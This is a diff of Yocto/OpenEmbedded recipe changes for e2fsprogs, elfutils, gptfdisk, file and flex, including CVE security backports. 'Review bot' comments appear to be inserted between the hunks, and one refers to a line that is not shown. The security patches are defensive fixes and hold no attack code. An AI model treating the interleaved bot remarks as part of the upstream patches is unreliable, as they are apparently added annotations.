inherit autotools gettext texinfo pkgconfig multilib_header update-alternatives ptest
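Review bot: This `SRC_URI` gains `;branch=master` but keeps the plain `git://` transport, whereas the dnf and file recipes touched in the same change also add `;protocol=https`. The `git://` protocol is unauthenticated and unencrypted, so the fetch then relies only on the pinned `SRCREV` for integrity. If the kernel.org host serves this repository over HTTPS, `SRC_URI = "git://git.kernel.org/pub/scm/fs/ext2/e2fsprogs.git;branch=master;protocol=https"` would bring the recipe in line with the others.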
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs/0001-e2fsck-don-t-try-to-rehash-a-deleted-directory.patch b/meta/recipes-devtools/e2fsprogs/e2fsprogs/0001-e2fsck-don-t-try-to-rehash-a-deleted-directory.patch
deleted file mode 100644
index ba4e3a3c97..0000000000
--- a/meta/recipes-devtools/e2fsprogs/e2fsprogs/0001-e2fsck-don-t-try-to-rehash-a-deleted-directory.patch
+++ /dev/null
@@ -1,49 +0,0 @@
-From 71ba13755337e19c9a826dfc874562a36e1b24d3 Mon Sep 17 00:00:00 2001
-From: Theodore Ts'o <tytso@mit.edu>
-Date: Thu, 19 Dec 2019 19:45:06 -0500
-Subject: [PATCH] e2fsck: don't try to rehash a deleted directory
-
-If directory has been deleted in pass1[bcd] processing, then we
-shouldn't try to rehash the directory in pass 3a when we try to
-rehash/reoptimize directories.
-
-Signed-off-by: Theodore Ts'o <tytso@mit.edu>
-
-Upstream-Status: Backport [https://git.kernel.org/pub/scm/fs/ext2/e2fsprogs.git/commit/?id=71ba13755337e19c9a826dfc874562a36e1b24d3]
-Signed-off-by: Anuj Mittal <anuj.mittal@intel.com>
----
- e2fsck/pass1b.c | 4 ++++
- e2fsck/rehash.c | 2 ++
- 2 files changed, 6 insertions(+)
-
-diff --git a/e2fsck/pass1b.c b/e2fsck/pass1b.c
-index 5693b9cf..bca701ca 100644
---- a/e2fsck/pass1b.c
-+++ b/e2fsck/pass1b.c
-@@ -705,6 +705,10 @@ static void delete_file(e2fsck_t ctx, ext2_ino_t ino,
- fix_problem(ctx, PR_1B_BLOCK_ITERATE, &pctx);
- if (ctx->inode_bad_map)
- ext2fs_unmark_inode_bitmap2(ctx->inode_bad_map, ino);
-+ if (ctx->inode_reg_map)
-+ ext2fs_unmark_inode_bitmap2(ctx->inode_reg_map, ino);
-+ ext2fs_unmark_inode_bitmap2(ctx->inode_dir_map, ino);
-+ ext2fs_unmark_inode_bitmap2(ctx->inode_used_map, ino);
- ext2fs_inode_alloc_stats2(fs, ino, -1, LINUX_S_ISDIR(dp->inode.i_mode));
- quota_data_sub(ctx->qctx, &dp->inode, ino,
- pb.dup_blocks * fs->blocksize);
-diff --git a/e2fsck/rehash.c b/e2fsck/rehash.c
-index 3dd1e941..2c908be0 100644
---- a/e2fsck/rehash.c
-+++ b/e2fsck/rehash.c
-@@ -1028,6 +1028,8 @@ void e2fsck_rehash_directories(e2fsck_t ctx)
- if (!ext2fs_u32_list_iterate(iter, &ino))
- break;
- }
-+ if (!ext2fs_test_inode_bitmap2(ctx->inode_dir_map, ino))
-+ continue;
-
- pctx.dir = ino;
- if (first) {
---
-2.24.1
-
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs/0001-misc-create_inode.c-set-dir-s-mode-correctly.patch b/meta/recipes-devtools/e2fsprogs/e2fsprogs/0001-misc-create_inode.c-set-dir-s-mode-correctly.patch
deleted file mode 100644
index fc4a540986..0000000000
--- a/meta/recipes-devtools/e2fsprogs/e2fsprogs/0001-misc-create_inode.c-set-dir-s-mode-correctly.patch
+++ /dev/null
@@ -1,41 +0,0 @@
-From f6d188580c2c9599319076fee22f2424652c711c Mon Sep 17 00:00:00 2001
-From: Robert Yang <liezhi.yang@windriver.com>
-Date: Wed, 13 Sep 2017 19:55:35 -0700
-Subject: [PATCH] misc/create_inode.c: set dir's mode correctly
-
-The dir's mode has been set by ext2fs_mkdir() with umask, so
-reset it to the source's mode in set_inode_extra().
-
-Fixed when source dir's mode is 521, but tarball would be 721, this was
-incorrect.
-
-Upstream-Status: Submitted
-
-Signed-off-by: Robert Yang <liezhi.yang@windriver.com>
----
- misc/create_inode.c | 9 ++++++++-
- 1 file changed, 8 insertions(+), 1 deletion(-)
-
-diff --git a/misc/create_inode.c b/misc/create_inode.c
-index 8ce3faf..50fbaa8 100644
---- a/misc/create_inode.c
-+++ b/misc/create_inode.c
-@@ -116,7 +116,14 @@ static errcode_t set_inode_extra(ext2_filsys fs, ext2_ino_t ino,
-
- inode.i_uid = st->st_uid;
- inode.i_gid = st->st_gid;
-- inode.i_mode |= st->st_mode;
-+ /*
-+ * The dir's mode has been set by ext2fs_mkdir() with umask, so
-+ * reset it to the source's mode
-+ */
-+ if S_ISDIR(st->st_mode)
-+ inode.i_mode = LINUX_S_IFDIR | st->st_mode;
-+ else
-+ inode.i_mode |= st->st_mode;
- inode.i_atime = st->st_atime;
- inode.i_mtime = st->st_mtime;
- inode.i_ctime = st->st_ctime;
---
-2.10.2
-
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs/CVE-2019-5188.patch b/meta/recipes-devtools/e2fsprogs/e2fsprogs/CVE-2019-5188.patch
deleted file mode 100644
index de4bce0037..0000000000
--- a/meta/recipes-devtools/e2fsprogs/e2fsprogs/CVE-2019-5188.patch
+++ /dev/null
@@ -1,57 +0,0 @@
-From 8dd73c149f418238f19791f9d666089ef9734dff Mon Sep 17 00:00:00 2001
-From: Theodore Ts'o <tytso@mit.edu>
-Date: Thu, 19 Dec 2019 19:37:34 -0500
-Subject: [PATCH] e2fsck: abort if there is a corrupted directory block when
- rehashing
-
-In e2fsck pass 3a, when we are rehashing directories, at least in
-theory, all of the directories should have had corruptions with
-respect to directory entry structure fixed. However, it's possible
-(for example, if the user declined a fix) that we can reach this stage
-of processing with a corrupted directory entries.
-
-So check for that case and don't try to process a corrupted directory
-block so we don't run into trouble in mutate_name() if there is a
-zero-length file name.
-
-Addresses: TALOS-2019-0973
-Addresses: CVE-2019-5188
-Signed-off-by: Theodore Ts'o <tytso@mit.edu>
-
-CVE: CVE-2019-5188
-Signed-off-by: Anuj Mittal <anuj.mittal@intel.com>
-Upstream-Status: Backport [https://git.kernel.org/pub/scm/fs/ext2/e2fsprogs.git/commit/?id=8dd73c149f418238f19791f9d666089ef9734dff]
----
- e2fsck/rehash.c | 9 +++++++++
- 1 file changed, 9 insertions(+)
-
-diff --git a/e2fsck/rehash.c b/e2fsck/rehash.c
-index a5fc1be1..3dd1e941 100644
---- a/e2fsck/rehash.c
-+++ b/e2fsck/rehash.c
-@@ -160,6 +160,10 @@ static int fill_dir_block(ext2_filsys fs,
- dir_offset += rec_len;
- if (dirent->inode == 0)
- continue;
-+ if ((name_len) == 0) {
-+ fd->err = EXT2_ET_DIR_CORRUPTED;
-+ return BLOCK_ABORT;
-+ }
- if (!fd->compress && (name_len == 1) &&
- (dirent->name[0] == '.'))
- continue;
-@@ -401,6 +405,11 @@ static int duplicate_search_and_fix(e2fsck_t ctx, ext2_filsys fs,
- continue;
- }
- new_len = ext2fs_dirent_name_len(ent->dir);
-+ if (new_len == 0) {
-+ /* should never happen */
-+ ext2fs_unmark_valid(fs);
-+ continue;
-+ }
- memcpy(new_name, ent->dir->name, new_len);
- mutate_name(new_name, &new_len);
- for (j=0; j < fd->num_array; j++) {
---
-2.24.1
-
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs/CVE-2022-1304.patch b/meta/recipes-devtools/e2fsprogs/e2fsprogs/CVE-2022-1304.patch
new file mode 100644
index 0000000000..34e2567b25
--- /dev/null
+++ b/meta/recipes-devtools/e2fsprogs/e2fsprogs/CVE-2022-1304.patch
@@ -0,0 +1,42 @@
+From a66071ed6a0d1fa666d22dcb78fa6fcb3bf22df3 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Fri, 27 May 2022 14:01:50 +0530
+Subject: [PATCH] CVE-2022-1304
+
+Upstream-Status: Backport [https://git.kernel.org/pub/scm/fs/ext2/e2fsprogs.git/commit/?h=maint&id=ab51d587bb9b229b1fade1afd02e1574c1ba5c76]
+CVE: CVE-2022-1304
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+---
+ lib/ext2fs/extent.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+diff --git a/lib/ext2fs/extent.c b/lib/ext2fs/extent.c
+index ac3dbfec9..a1b1905cd 100644
+--- a/lib/ext2fs/extent.c
++++ b/lib/ext2fs/extent.c
+@@ -495,6 +495,10 @@ retry:
+ ext2fs_le16_to_cpu(eh->eh_entries);
+ newpath->max_entries = ext2fs_le16_to_cpu(eh->eh_max);
+
++ /* Make sure there is at least one extent present */
++ if (newpath->left <= 0)
++ return EXT2_ET_EXTENT_NO_DOWN;
++
+ if (path->left > 0) {
+ ix++;
+ newpath->end_blk = ext2fs_le32_to_cpu(ix->ei_block);
+@@ -1630,6 +1634,10 @@ errcode_t ext2fs_extent_delete(ext2_extent_handle_t handle, int flags)
+
+ cp = path->curr;
+
++ /* Sanity check before memmove() */
++ if (path->left < 0)
++ return EXT2_ET_EXTENT_LEAF_BAD;
++
+ if (path->left) {
+ memmove(cp, cp + sizeof(struct ext3_extent_idx),
+ path->left * sizeof(struct ext3_extent_idx));
+--
+2.25.1
+
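Review bot: The header of this security backport carries no description of the defect: the subject is just `CVE-2022-1304`, and the `From:` and `Date:` lines are those of the backporter rather than of the upstream commit referenced in `Upstream-Status`. Someone auditing the recipe then has to open the upstream link to learn what the two added checks in lib/ext2fs/extent.c protect against. Keeping the upstream subject line and commit message, with the backporter's `Signed-off-by` added below as the other backports in this change do, would preserve that context. Both patched functions start and end outside their hunks.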
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs/big-inodes-for-small-fs.patch b/meta/recipes-devtools/e2fsprogs/e2fsprogs/big-inodes-for-small-fs.patch
new file mode 100644
index 0000000000..caeb560d32
--- /dev/null
+++ b/meta/recipes-devtools/e2fsprogs/e2fsprogs/big-inodes-for-small-fs.patch
@@ -0,0 +1,22 @@
+Ensure "small" file systems also have the default inode size (256 bytes) so that
+can store 64-bit timestamps and work past 2038.
+
+The "small" type is any size >3MB and <512MB, which covers a lot of relatively
+small filesystems built by OE, especially when they're sized to fit the contents
+and expand to the storage on boot.
+
+Upstream-Status: Inappropriate
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+diff --git a/misc/mke2fs.conf.in b/misc/mke2fs.conf.in
+index 01e35cf8..29f41dc0 100644
+--- a/misc/mke2fs.conf.in
++++ b/misc/mke2fs.conf.in
+@@ -16,7 +16,6 @@
+ }
+ small = {
+ blocksize = 1024
+- inode_size = 128
+ inode_ratio = 4096
+ }
+ floppy = {
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsck-fix-use-after-free-in-calculate_tree.patch b/meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsck-fix-use-after-free-in-calculate_tree.patch
deleted file mode 100644
index 342a2b855b..0000000000
--- a/meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsck-fix-use-after-free-in-calculate_tree.patch
+++ /dev/null
@@ -1,76 +0,0 @@
-From: Wang Shilong <wshilong@ddn.com>
-Date: Mon, 30 Dec 2019 19:52:39 -0500
-Subject: e2fsck: fix use after free in calculate_tree()
-
-The problem is alloc_blocks() will call get_next_block() which might
-reallocate outdir->buf, and memory address could be changed after
-this. To fix this, pointers that point into outdir->buf, such as
-int_limit and root need to be recaulated based on the new starting
-address of outdir->buf.
-
-[ Changed to correctly recalculate int_limit, and to optimize how we
- reallocate outdir->buf. -TYT ]
-
-Addresses-Debian-Bug: 948517
-Signed-off-by: Wang Shilong <wshilong@ddn.com>
-Signed-off-by: Theodore Ts'o <tytso@mit.edu>
-(cherry picked from commit 101e73e99ccafa0403fcb27dd7413033b587ca01)
-
-Signed-off-by: Anuj Mittal <anuj.mittal@intel.com>
-Upstream-Status: Backport [https://git.kernel.org/pub/scm/fs/ext2/e2fsprogs.git/commit/?id=101e73e99ccafa0403fcb27dd7413033b587ca01]
----
- e2fsck/rehash.c | 17 ++++++++++++++++-
- 1 file changed, 16 insertions(+), 1 deletion(-)
-
-diff --git a/e2fsck/rehash.c b/e2fsck/rehash.c
-index 0a5888a9..2574e151 100644
---- a/e2fsck/rehash.c
-+++ b/e2fsck/rehash.c
-@@ -295,7 +295,11 @@ static errcode_t get_next_block(ext2_filsys fs, struct out_dir *outdir,
- errcode_t retval;
-
- if (outdir->num >= outdir->max) {
-- retval = alloc_size_dir(fs, outdir, outdir->max + 50);
-+ int increment = outdir->max / 10;
-+
-+ if (increment < 50)
-+ increment = 50;
-+ retval = alloc_size_dir(fs, outdir, outdir->max + increment);
- if (retval)
- return retval;
- }
-@@ -637,6 +641,9 @@ static int alloc_blocks(ext2_filsys fs,
- if (retval)
- return retval;
-
-+ /* outdir->buf might be reallocated */
-+ *prev_ent = (struct ext2_dx_entry *) (outdir->buf + *prev_offset);
-+
- *next_ent = set_int_node(fs, block_start);
- *limit = (struct ext2_dx_countlimit *)(*next_ent);
- if (next_offset)
-@@ -726,6 +733,9 @@ static errcode_t calculate_tree(ext2_filsys fs,
- return retval;
- }
- if (c3 == 0) {
-+ int delta1 = (char *)int_limit - outdir->buf;
-+ int delta2 = (char *)root - outdir->buf;
-+
- retval = alloc_blocks(fs, &limit, &int_ent,
- &dx_ent, &int_offset,
- NULL, outdir, i, &c2,
-@@ -733,6 +743,11 @@ static errcode_t calculate_tree(ext2_filsys fs,
- if (retval)
- return retval;
-
-+ /* outdir->buf might be reallocated */
-+ int_limit = (struct ext2_dx_countlimit *)
-+ (outdir->buf + delta1);
-+ root = (struct ext2_dx_entry *)
-+ (outdir->buf + delta2);
- }
- dx_ent->block = ext2fs_cpu_to_le32(i);
- if (c3 != limit->limit)
---
-2.24.1
-
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsprogs-fix-missing-check-for-permission-denied.patch b/meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsprogs-fix-missing-check-for-permission-denied.patch
index 4d335af4cf..284ac90196 100644
--- a/meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsprogs-fix-missing-check-for-permission-denied.patch
+++ b/meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsprogs-fix-missing-check-for-permission-denied.patch
@@ -1,4 +1,4 @@
-From e8331a76983e839a3d193446ab8ae9c1b09daa07 Mon Sep 17 00:00:00 2001
+From b55dfb4b62e507ae4f0814aec7597b56f9d6292a Mon Sep 17 00:00:00 2001
From: Jackie Huang <jackie.huang@windriver.com>
Date: Wed, 10 Aug 2016 11:19:44 +0800
Subject: [PATCH] Fix missing check for permission denied.
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs/quiet-debugfs.patch b/meta/recipes-devtools/e2fsprogs/e2fsprogs/quiet-debugfs.patch
index 95e6a7a2d5..aac88eed98 100644
--- a/meta/recipes-devtools/e2fsprogs/e2fsprogs/quiet-debugfs.patch
+++ b/meta/recipes-devtools/e2fsprogs/e2fsprogs/quiet-debugfs.patch
@@ -1,4 +1,4 @@
-From de6d6f0dd010f5b9d917553acb9430278f448f23 Mon Sep 17 00:00:00 2001
+From 9aa68ad81b97847dda3493145f4b0a7cc580c551 Mon Sep 17 00:00:00 2001
From: Ross Burton <ross.burton@intel.com>
Date: Mon, 23 Dec 2013 13:38:34 +0000
Subject: [PATCH] e2fsprogs: silence debugfs
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs/run-ptest b/meta/recipes-devtools/e2fsprogs/e2fsprogs/run-ptest
index c97c0377e9..279923db8e 100644
--- a/meta/recipes-devtools/e2fsprogs/e2fsprogs/run-ptest
+++ b/meta/recipes-devtools/e2fsprogs/e2fsprogs/run-ptest
@@ -8,3 +8,4 @@ rm -f *.tmp
rm -f *.ok
rm -f *.failed
rm -f *.log
+cp ../data/test_data.tmp ./
diff --git a/meta/recipes-devtools/e2fsprogs/e2fsprogs_1.45.4.bb b/meta/recipes-devtools/e2fsprogs/e2fsprogs_1.45.7.bb
index 4f7cafeac9..565c433866 100644
--- a/meta/recipes-devtools/e2fsprogs/e2fsprogs_1.45.4.bb
+++ b/meta/recipes-devtools/e2fsprogs/e2fsprogs_1.45.7.bb
@@ -4,19 +4,17 @@ SRC_URI += "file://remove.ldconfig.call.patch \
file://run-ptest \
file://ptest.patch \
file://mkdir_p.patch \
- file://0001-misc-create_inode.c-set-dir-s-mode-correctly.patch \
file://0001-configure.ac-correct-AM_GNU_GETTEXT.patch \
file://0001-intl-do-not-try-to-use-gettext-defines-that-no-longe.patch \
- file://CVE-2019-5188.patch \
- file://0001-e2fsck-don-t-try-to-rehash-a-deleted-directory.patch \
- file://e2fsck-fix-use-after-free-in-calculate_tree.patch \
+ file://CVE-2022-1304.patch \
"
SRC_URI_append_class-native = " file://e2fsprogs-fix-missing-check-for-permission-denied.patch \
file://quiet-debugfs.patch \
+ file://big-inodes-for-small-fs.patch \
"
-SRCREV = "984ff8d6a0a1d5dc300505f67b38ed5047d51dac"
+SRCREV = "5403970e44241cec26f98aaa0124b9881b4bbf4f"
UPSTREAM_CHECK_GITTAGREGEX = "v(?P<pver>\d+\.\d+(\.\d+)*)$"
EXTRA_OECONF += "--libdir=${base_libdir} --sbindir=${base_sbindir} \
@@ -56,6 +54,7 @@ do_install () {
oe_multilib_header ext2fs/ext2_types.h
install -d ${D}${base_bindir}
mv ${D}${bindir}/chattr ${D}${base_bindir}/chattr.e2fsprogs
+ mv ${D}${bindir}/lsattr ${D}${base_bindir}/lsattr.e2fsprogs
install -v -m 755 ${S}/contrib/populate-extfs.sh ${D}${base_sbindir}/
@@ -104,10 +103,12 @@ FILES_libe2p = "${base_libdir}/libe2p.so.*"
FILES_libext2fs = "${libdir}/e2initrd_helper ${base_libdir}/libext2fs.so.*"
FILES_${PN}-dev += "${datadir}/*/*.awk ${datadir}/*/*.sed ${base_libdir}/*.so ${bindir}/compile_et ${bindir}/mk_cmds"
-ALTERNATIVE_${PN} = "chattr"
+ALTERNATIVE_${PN} = "chattr lsattr"
ALTERNATIVE_PRIORITY = "100"
ALTERNATIVE_LINK_NAME[chattr] = "${base_bindir}/chattr"
ALTERNATIVE_TARGET[chattr] = "${base_bindir}/chattr.e2fsprogs"
+ALTERNATIVE_LINK_NAME[lsattr] = "${base_bindir}/lsattr"
+ALTERNATIVE_TARGET[lsattr] = "${base_bindir}/lsattr.e2fsprogs"
ALTERNATIVE_${PN}-doc = "fsck.8"
ALTERNATIVE_LINK_NAME[fsck.8] = "${mandir}/man8/fsck.8"
@@ -128,6 +129,8 @@ do_compile_ptest() {
}
do_install_ptest() {
+ # This file's permissions depends on the host umask so be deterministic
+ chmod 0644 ${B}/tests/test_data.tmp
cp -R --no-dereference --preserve=mode,links -v ${B}/tests ${D}${PTEST_PATH}/test
cp -R --no-dereference --preserve=mode,links -v ${S}/tests/* ${D}${PTEST_PATH}/test
sed -e 's!../e2fsck/e2fsck!e2fsck!g' \
@@ -141,4 +144,7 @@ do_install_ptest() {
install -d ${D}${PTEST_PATH}/lib
install -m 0644 ${B}/lib/config.h ${D}${PTEST_PATH}/lib/
+
+ install -d ${D}${PTEST_PATH}/data
+ install -m 0644 ${B}/tests/test_data.tmp ${D}${PTEST_PATH}/data/
}
diff --git a/meta/recipes-devtools/elfutils/elfutils_0.178.bb b/meta/recipes-devtools/elfutils/elfutils_0.178.bb
index c500ae3c19..29a3bbfffb 100644
--- a/meta/recipes-devtools/elfutils/elfutils_0.178.bb
+++ b/meta/recipes-devtools/elfutils/elfutils_0.178.bb
@@ -1,5 +1,6 @@
SUMMARY = "Utilities and libraries for handling compiled object files"
HOMEPAGE = "https://sourceware.org/elfutils"
+DESCRIPTION = "elfutils is a collection of utilities and libraries to read, create and modify ELF binary files, find and handle DWARF debug data, symbols, thread state and stacktraces for processes and core files on GNU/Linux."
SECTION = "base"
LICENSE = "GPLv2 & LGPLv3+ & GPLv3+"
LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504"
@@ -33,6 +34,7 @@ SRC_URI = "https://sourceware.org/elfutils/ftp/${PV}/${BP}.tar.bz2 \
file://0001-ppc_initreg.c-Incliude-asm-ptrace.h-for-pt_regs-defi.patch \
file://run-ptest \
file://ptest.patch \
+ file://CVE-2021-33294.patch \
"
SRC_URI_append_libc-musl = " \
file://0001-musl-obstack-fts.patch \
diff --git a/meta/recipes-devtools/elfutils/files/CVE-2021-33294.patch b/meta/recipes-devtools/elfutils/files/CVE-2021-33294.patch
new file mode 100644
index 0000000000..0500a4cf83
--- /dev/null
+++ b/meta/recipes-devtools/elfutils/files/CVE-2021-33294.patch
@@ -0,0 +1,72 @@
+From 480b6fa3662ba8ffeee274bf0d37423413c01e55 Mon Sep 17 00:00:00 2001
+From: Mark Wielaard <mark@klomp.org>
+Date: Wed, 3 Mar 2021 21:40:53 +0100
+Subject: [PATCH] readelf: Sanity check verneed and verdef offsets in handle_symtab.
+
+We are going through vna_next, vn_next and vd_next in a while loop.
+Make sure that all offsets are sane. We don't want things to wrap
+around so we go in cycles.
+
+https://sourceware.org/bugzilla/show_bug.cgi?id=27501
+
+Signed-off-by: Mark Wielaard <mark@klomp.org>
+
+Upstream-Status: Backport [https://sourceware.org/git/?p=elfutils.git;a=commit;h=480b6fa3662ba8ffeee274bf0d37423413c01e55]
+CVE: CVE-2021-33294
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/ChangeLog | 5 +++++
+ src/readelf.c | 10 +++++++++-
+ 2 files changed, 14 insertions(+), 1 deletion(-)
+
+diff --git a/src/ChangeLog b/src/ChangeLog
+index 6af977e..f0d9e39 100644
+--- a/src/ChangeLog
++++ b/src/ChangeLog
+@@ -1,3 +1,8 @@
++2021-03-03 Mark Wielaard <mark@klomp.org>
++
++ * readelf.c (handle_symtab): Sanity check verneed vna_next,
++ vn_next and verdef vd_next offsets.
++
+ 2019-11-26 Mark Wielaard <mark@klomp.org>
+
+ * Makefile.am (BUILD_STATIC): Add libraries needed for libdw.
+diff --git a/src/readelf.c b/src/readelf.c
+index 5994615..ab7a1c1 100644
+--- a/src/readelf.c
++++ b/src/readelf.c
+@@ -2550,7 +2550,9 @@ handle_symtab (Ebl *ebl, Elf_Scn *scn, GElf_Shdr *shdr)
+ &vernaux_mem);
+ while (vernaux != NULL
+ && vernaux->vna_other != *versym
+- && vernaux->vna_next != 0)
++ && vernaux->vna_next != 0
++ && (verneed_data->d_size - vna_offset
++ >= vernaux->vna_next))
+ {
+ /* Update the offset. */
+ vna_offset += vernaux->vna_next;
+@@ -2567,6 +2569,9 @@ handle_symtab (Ebl *ebl, Elf_Scn *scn, GElf_Shdr *shdr)
+ /* Found it. */
+ break;
+
++ if (verneed_data->d_size - vn_offset < verneed->vn_next)
++ break;
++
+ vn_offset += verneed->vn_next;
+ verneed = (verneed->vn_next == 0
+ ? NULL
+@@ -2602,6 +2607,9 @@ handle_symtab (Ebl *ebl, Elf_Scn *scn, GElf_Shdr *shdr)
+ /* Found the definition. */
+ break;
+
++ if (verdef_data->d_size - vd_offset < verdef->vd_next)
++ break;
++
+ vd_offset += verdef->vd_next;
+ verdef = (verdef->vd_next == 0
+ ? NULL
+--
+2.25.1
+
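Review bot: The three added bounds checks in handle_symtab subtract an offset from `d_size` (`verneed_data->d_size - vna_offset`, `verneed_data->d_size - vn_offset`, `verdef_data->d_size - vd_offset`). That gives the remaining byte count only while the offset is not already larger than `d_size`; with unsigned operands a larger offset would wrap and let the check pass. The declarations and initial values of these offsets are outside the hunk, so the invariant is presumably established by the preceding lookup having returned a non-NULL entry, but the patch does not record it. A comment at the first check, such as `/* offset <= d_size is assumed here because the entry at that offset was just read */`, would state the assumption. handle_symtab starts and ends outside the hunks.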
diff --git a/meta/recipes-devtools/fdisk/gptfdisk_1.0.4.bb b/meta/recipes-devtools/fdisk/gptfdisk_1.0.4.bb
index b043c96543..ef5d83ebaf 100644
--- a/meta/recipes-devtools/fdisk/gptfdisk_1.0.4.bb
+++ b/meta/recipes-devtools/fdisk/gptfdisk_1.0.4.bb
@@ -1,5 +1,6 @@
SUMMARY = "Utility for modifying GPT disk partitioning"
DESCRIPTION = "GPT fdisk is a disk partitioning tool loosely modeled on Linux fdisk, but used for modifying GUID Partition Table (GPT) disks. The related FixParts utility fixes some common problems on Master Boot Record (MBR) disks."
+HOMEPAGE = "https://sourceforge.net/projects/gptfdisk/"
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=59530bdf33659b29e73d4adb9f9f6552"
diff --git a/meta/recipes-devtools/file/file_5.38.bb b/meta/recipes-devtools/file/file_5.38.bb
index 2d62ead10b..b19bf03986 100644
--- a/meta/recipes-devtools/file/file_5.38.bb
+++ b/meta/recipes-devtools/file/file_5.38.bb
@@ -11,7 +11,7 @@ LIC_FILES_CHKSUM = "file://COPYING;beginline=2;md5=0251eaec1188b20d9a72c502ecfdd
DEPENDS = "file-replacement-native"
DEPENDS_class-native = "bzip2-replacement-native"
-SRC_URI = "git://github.com/file/file.git"
+SRC_URI = "git://github.com/file/file.git;branch=master;protocol=https"
SRCREV = "ec41083645689a787cdd00cb3b5bf578aa79e46c"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-devtools/flex/flex/0001-Emit-no-line-directives-if-gen_line_dirs-is-false.patch b/meta/recipes-devtools/flex/flex/0001-Emit-no-line-directives-if-gen_line_dirs-is-false.patch
new file mode 100644
index 0000000000..c8202b6bd5
--- /dev/null
+++ b/meta/recipes-devtools/flex/flex/0001-Emit-no-line-directives-if-gen_line_dirs-is-false.patch
@@ -0,0 +1,32 @@
+From 440f3f55739468cd26e22f31871eca8cbbd53294 Mon Sep 17 00:00:00 2001
+From: Oleksiy Obitotskyy <oobitots@cisco.com>
+Date: Wed, 6 Jan 2021 06:12:14 -0800
+Subject: [PATCH] Emit no #line directives if gen_line_dirs is false
+
+If we set --noline we should not print line directives.
+But setting --noline means gen_line_dirs is false.
+
+Upstream-Status: Submitted
+Signed-off-by: Oleksiy Obitotskyy <oobitots@cisco.com>
+---
+ src/buf.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/src/buf.c b/src/buf.c
+index 185083c..4439e28 100644
+--- a/src/buf.c
++++ b/src/buf.c
+@@ -95,8 +95,8 @@ struct Buf *buf_linedir (struct Buf *buf, const char* filename, int lineno)
+ const char *src;
+ size_t tsz;
+
+- if (gen_line_dirs)
+- return buf;
++ if (!gen_line_dirs)
++ return buf;
+
+ tsz = strlen("#line \"\"\n") + /* constant parts */
+ 2 * strlen (filename) + /* filename with possibly all backslashes escaped */
+--
+2.26.2.Cisco
+
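Review bot: `Upstream-Status: Submitted` in this patch header gives no reference to where the change was sent, so someone auditing the recipe later cannot check whether upstream accepted, reworked or rejected the inverted `gen_line_dirs` test in `buf_linedir`. The tag should record the destination, for example `Upstream-Status: Submitted [<link to the upstream pull request or list post>]`. check-funcs.patch, added next in this commit, has the same gap: its `Upstream-Status: Backport` names no upstream commit. The only hash in its description is the commit that exposed the autoheader bug, which is easy to mistake for the backported one.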
diff --git a/meta/recipes-devtools/flex/flex/check-funcs.patch b/meta/recipes-devtools/flex/flex/check-funcs.patch
new file mode 100644
index 0000000000..762275e7f8
--- /dev/null
+++ b/meta/recipes-devtools/flex/flex/check-funcs.patch
@@ -0,0 +1,67 @@
+Subject: build: Move dnl comments out of AC_CHECK_FUNCS
+
+Due to a bug, autoheader (2.69) will treat M4 dnl comments in a quoted
+argument of AC_CHECK_FUNCS as function tokens and generate a lot of
+redundant and useless HAVE_* macros in config.h.in.
+(Examples: HAVE_DNL, HAVE_AVAILABLE_, HAVE_BY)
+
+It seems to be this commit dbb4e94dc7bacbcfd4acef4f085ef752fe1aa03f of
+mine that revealed this autoheader bug, and the affected config.h.in
+had been shipped within flex-2.6.4 release tarball.
+
+I have reported the autoheader bug here:
+<https://lists.gnu.org/archive/html/bug-autoconf/2018-02/msg00005.html>
+
+As a workaround, let's move comments out of AC_CHECK_FUNCS.
+
+Upstream-Status: Backport
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+Signed-off-by: Kang-Che Sung <explorer09@gmail.com>
+Signed-off-by: Zang Ruochen <zangrc.fnst@cn.fujitsu.com>
+---
+ configure.ac | 28 +++++++++++++---------------
+ 1 file changed, 13 insertions(+), 15 deletions(-)
+
+diff --git a/configure.ac b/configure.ac
+index 55e774b..5ea3a93 100644
+--- a/configure.ac
++++ b/configure.ac
+@@ -153,21 +153,19 @@ AC_FUNC_REALLOC
+ AS_IF([test "$cross_compiling" = yes],
+ AC_MSG_WARN([result $ac_cv_func_realloc_0_nonnull guessed because of cross compilation]))
+
+-AC_CHECK_FUNCS([dup2 dnl
+-memset dnl
+-regcomp dnl
+-strcasecmp dnl
+-strchr dnl
+-strdup dnl
+-strtol dnl
+-], [], [AC_MSG_ERROR(required library function not found on your system)])
+-
+-# Optional library functions
+-AC_CHECK_FUNCS([dnl
+-pow dnl Used only by "examples/manual/expr"
+-setlocale dnl Needed only if NLS is enabled
+-reallocarray dnl OpenBSD function. We have replacement if not available.
+-])
++dnl Autoheader (<= 2.69) bug: "dnl" comments in a quoted argument of
++dnl AC_CHECK_FUNCS will expand wierdly in config.h.in.
++dnl (https://lists.gnu.org/archive/html/bug-autoconf/2018-02/msg00005.html)
++
++AC_CHECK_FUNCS([dup2 memset regcomp strcasecmp strchr strdup strtol], [],
++ [AC_MSG_ERROR(required library function not found on your system)])
++
++# Optional library functions:
++# pow - Used only by "examples/manual/expr".
++# setlocale - Needed only if NLS is enabled.
++# reallocarr - NetBSD function. Use reallocarray if not available.
